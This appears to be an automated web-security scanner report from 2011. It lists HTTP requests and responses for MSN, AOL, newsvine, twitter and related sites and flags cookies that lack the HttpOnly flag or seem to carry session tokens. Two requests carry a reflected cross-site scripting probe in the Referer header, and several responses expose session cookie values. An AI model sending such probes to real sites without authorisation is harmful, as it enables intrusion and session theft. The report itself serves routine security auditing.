GET / HTTP/1.1 Host: www.newsvine.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; vid=d22bc33559f8a0701e021885c03ad2c9; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:02:03 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Keep-Alive: timeout=3, max=999 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 56108
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /_action/user/logout HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 03:20:10 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=a518bd3650bb791008fc921ee62dad0e; expires=Sat, 25-Jan-2031 03:20:10 GMT; path=/; domain=.newsvine.com Pragma: no-cache Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 03:20:14 GMT; path=/; domain=.newsvine.com Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F1272465988 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/global/information HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:51 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3baaa49edd0123eafe283532e331e3c0; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com Location: https://www.newsvine.com/_nv/accounts/accountSettingsLogin?tab=global&item=information&redirect=https%3A%2F%2Fwww.newsvine.com%2F_nv%2Faccounts%2Fglobal%2Finformation Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:58:45 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 10103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:14:53 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/msnbc/newsletters HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:23:00 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 41168
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/register HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:53 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 11769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/api/accounts/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:51 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 01:23:51 GMT Vary: Accept-Encoding Content-Length: 97 Content-Type: application/json Connection: close
{"data":{"errors":{"L2":"Please enter your email address and password."}},"statusCode":"failure"}
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/api/accounts/resetPassword HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:14:02 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 03:15:02 GMT Vary: Accept-Encoding Content-Length: 100 Content-Type: application/json Connection: close
{"data":{"errors":{"RP1":"Please enter your email address or domain name."}},"statusCode":"failure"}
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.terra.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 02:03:33 GMT Server: Apache X-Powered-By: PHP/5.2.10 Status: 404 Not Found Location: http://buscador.terra.com/404.aspx?ca=z&query=$%7Cwww&source=Search&curl=http://www.terra.com/$%7Cwww.people.com/$%7Chttp:/www.walmart.com/%7Chttp:/www.walmart.com/cp/toys/4171%7Chttp:/www.walmart.com/cp/Electronics/3944 Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296353013.43280; path=/; expires=Fri, 01-Jan-2016 00:02:15 GMT; domain=.terra.com Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/CKZzn00w01M HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/mm8byzo8zWE HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
SESSff329d810a46b3a1bf645141daed34cf=985ce46f8c25697973bf76c1fb01cf21; expires=Tue, 22 Feb 2011 05:38:40 GMT; path=/; domain=.advertising.aol.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy/advertisingcom/opt-out HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: careers.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://careers.microsoft.com/gclp.aspx Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=imfrgsjgkicnzcjt42531kjd; path=/; HttpOnly Set-Cookie: ASP.NET_SessionId=h2kb0f3zzbexr4550xzpoczx; path=/; HttpOnly Set-Cookie: SessionProfile=imfrgsjgkicnzcjt42531kjd; path=/; secure X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Date: Sat, 29 Jan 2011 23:45:40 GMT Connection: close Content-Length: 155
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://careers.microsoft.com/gclp.aspx">here</a>.</h2> </body></html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /o.asp?id=swHtlTXj HTTP/1.1 Host: ccc01.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14859 Content-Type: text/html; Charset=UTF-8 X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDCQTCBBDR=KLBDJLOBBPPOPIONDAELIJLO; path=/ Date: Sat, 29 Jan 2011 23:45:32 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /o.asp HTTP/1.1 Host: ccc01.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDASTCBBCQ=MBCDJLOBBDKPLCFLGGHFIDII; path=/ Date: Sat, 29 Jan 2011 23:45:32 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /o.asp HTTP/1.1 Host: ccc01.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDSCDTCACS=FPMEIDMCJOFCBFNMKCBECFLJ; path=/ Date: Sun, 30 Jan 2011 16:42:21 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cp.aspx HTTP/1.1 Host: dating.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ferrors%2fErrorPage.aspx%3faspxerrorpath%3d%2fcp.aspx">here</a>.</h2> </body></html>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/partner/msn/38028.html HTTP/1.1 Host: dating.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.aspx HTTP/1.1 Host: dating.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/index.aspx HTTP/1.1 Host: dating.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: games.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-WR-L: 74,NC Set-Cookie: MSGmSession=RUID=d177791d618543afa46923d904b9fd9b&Env=AP2; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:46:32 GMT Connection: close Content-Length: 45429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta http-equiv= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=aKD9jFE80awb; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /6M HTTP/1.1 Host: malexj.tk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 02:09:32 GMT Server: Resin/2.1.17 Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Server: maloofuta.ams.taloha.net Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=aKD9jFE80awb; path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cp/landing/44762 HTTP/1.1 Host: msn.chemistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head id="CPPageView_ctl00_head1"> <title>Chemistry a new online dating ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cp/landing/57269 HTTP/1.1 Host: msn.chemistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head id="CPPageView_ctl00_head1"> <title>Chemistry a new online dating ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 210537 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=72E4F63379582C3093F112CC8DFB1BD7; Path=/ X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=28 Date: Sat, 29 Jan 2011 23:49:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: msn.whitepages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /$|zone.redacted|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: photobucket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/comment_card.asp?time1= HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6067 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDSABQACCS=EBBIKHPBAPMOLLILHIAIEMFN; path=/ Date: Sun, 30 Jan 2011 01:37:11 GMT Connection: close
<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure.opinionlab.com/ccc01"> <title>Comment Ca ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/o.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Content-Type: text/html Set-Cookie: ASPSESSIONIDSABQACCS=LHLFKHPBAJOOIDHFICBAPGEC; path=/ Date: Sat, 29 Jan 2011 23:50:47 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/o.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Content-Type: text/html Set-Cookie: ASPSESSIONIDSCDTCACS=DPCFIDMCHKHICEPBPALEFKKC; path=/ Date: Sun, 30 Jan 2011 16:57:26 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv HTTP/1.1 Host: t.mookie1.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:27:29 GMT Server: Apache/2.0.52 (Red Hat) Cache-Control: no-cache Pragma: no-cache P3P: CP="NOI DSP COR NID CUR OUR NOR" Set-Cookie: session=1296350849|1296350849; path=/; domain=.mookie1.com Content-Length: 35 Content-Type: image/gif
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
TSSESSID=ts-www0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /milesobrien/ HTTP/1.1 Host: trueslant.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:01:12 GMT Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch X-Powered-By: PHP/5.2.6-3ubuntu4.5 Vary: Cookie,Accept-Encoding X-FBC-Login: anonymous fbuid=0, wpuid=0 X-Pingback: http://trueslant.com/milesobrien/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: TSSESSID=ts-www0; path=/ Content-Length: 75441
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" dir="ltr" xmlns:fb="http ...[SNIP]...
guest_id=129635228410273876; path=/; expires=Tue, 01 Mar 2011 01:51:24 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 01:51:24 GMT Server: hi Status: 200 OK X-Transaction: 1296352284-49541-12061 ETag: "cde121a33e5e26c8e020ac06ab7c0791" Last-Modified: Sun, 30 Jan 2011 01:51:24 GMT X-Runtime: 0.00851 Content-Type: text/html; charset=utf-8 Content-Length: 45480 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296352284099799; path=/; expires=Sun, 06-Feb-11 01:51:24 GMT; domain=.twitter.com Set-Cookie: guest_id=129635228410273876; path=/; expires=Tue, 01 Mar 2011 01:51:24 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY3NzI0MTZlMzM1NDZkMGY1ZTRhYmFmNDRmZGQwYzk2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyA2e1C0B--25862b81113d9ea376a5433cc256332cc9ae6576; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
